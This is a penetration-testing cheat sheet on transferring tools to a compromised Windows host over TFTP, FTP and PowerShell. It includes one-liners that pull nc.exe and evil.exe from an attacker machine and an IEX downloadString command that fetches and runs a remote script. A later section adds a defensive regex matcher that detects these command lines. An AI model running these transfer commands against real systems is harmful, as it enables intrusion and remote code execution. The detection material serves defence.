3.7-Windows-File-Transfer.md

Pre-Intrusion phase (Windows)

File Transfer

TFTP

TFTP clients are usually non-interactive, so they can work through an obtained shell (Windows XP and Windows 2003 include a TFTP client by default).

atftpd --daemon --port 69 /tftp
Windows> tftp -i 192.168.30.45 GET nc.exe

FTP (pyftpdlib client on Kali)

FTP is generally installed on Windows machines; to make it interactive, use the -s option.

On Kali, install an FTP client and set a username/password

apt-get install python-pyftpdlib  
python -m pyftpdlib -p 21

On Windows

ftp <ip>
> binary
> get exploit.exe

FTP (pureftpd client on Kali)

On Kali

# install pure-ftpd
apt-get install pure-ftpd
# create a group
groupadd ftpgroup
# add a user
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
# Create a directory for your ftp-files (you can also specify a specific user e.g.: /root/ftphome/bob).
mkdir /root/ftphome
# Create a ftp-user, in our example "bob" (again you can set "-d /root/ftphome/bob/" if you wish).
pure-pw useradd bob -u ftpuser -g ftpgroup -d /root/ftphome/
# Update the ftp database after adding our new user.
pure-pw mkdb
# change ownership of the specified ftp directory
chown -R ftpuser:ftpgroup /root/ftphome
# restart Pure-FTPD
/etc/init.d/pure-ftpd restart

On Windows

echo open <ip> 21> ftp.txt
echo USER username password >> ftp.txt
echo bin >> ftp.txt
echo GET evil.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt

PowerShell

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://<ip>/powerup.ps1" >>wget.ps1
echo $file = "powerup.ps1" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

download file

powershell "IEX(New-Object Net.WebClient).downloadString('http://<ip>/file.ps1')"
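
Seen from the defending side, each transfer above leaves a recognisable process command line on the Windows host. The following is an added example, not part of the original notes: a small matcher run over process-creation command lines, where the rule names, host names and sample events are constructed for illustration.

```python
import re

# Hypothetical rule names; each pattern mirrors a command line shown on this page.
RULES = [
    # tftp in binary (-i) mode pulling a file
    ("tftp_binary_get", re.compile(r"\btftp(\.exe)?\b.*\s-i\s.*\bget\b", re.I)),
    # ftp driven by a script file instead of a person typing
    ("ftp_script_file", re.compile(r"\bftp(\.exe)?\b.*\s-s:\S+", re.I)),
    # powershell started with the execution policy overridden
    ("ps_policy_bypass", re.compile(r"\bpowershell(\.exe)?\b.*-(ep|ex\w*)\s+bypass", re.I)),
    # WebClient download visible directly on the command line
    ("ps_webclient_download", re.compile(r"net\.webclient.*\.download(file|string)\s*\(", re.I)),
    # downloaded text handed straight to Invoke-Expression
    ("ps_iex_download", re.compile(r"\b(iex|invoke-expression)\b.*downloadstring", re.I)),
]

def classify(command_line):
    """Return the names of all rules matching one process command line."""
    return [name for name, rx in RULES if rx.search(command_line)]

def scan(events):
    """events: iterable of (host, command_line). Return only the flagged ones."""
    hits = []
    for host, cmd in events:
        names = classify(cmd)
        if names:
            hits.append((host, names, cmd))
    return hits

# Constructed sample events; 192.0.2.10 is a documentation address.
SAMPLE = [
    ("ws01", "tftp -i 192.0.2.10 GET nc.exe"),
    ("ws01", "ftp -s:ftp.txt"),
    # wget.ps1 case: DownloadFile lives inside the script, so only the
    # launch flags show here; the body needs PowerShell script block logging.
    ("ws02", "powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive "
             "-NoProfile -File wget.ps1"),
    ("ws02", "powershell \"IEX(New-Object Net.WebClient)"
             ".downloadString('http://192.0.2.10/file.ps1')\""),
    ("ws03", "ftp.exe"),                                     # no script file
    ("ws03", "powershell.exe -NoProfile -File backup.ps1"),  # no bypass
]

if __name__ == "__main__":
    for host, names, cmd in scan(SAMPLE):
        print(host, ",".join(names), "|", cmd)
```

These patterns are triage signals rather than verdicts: administrators also script ftp and override the execution policy, so matches should be correlated with the parent process and the network destination.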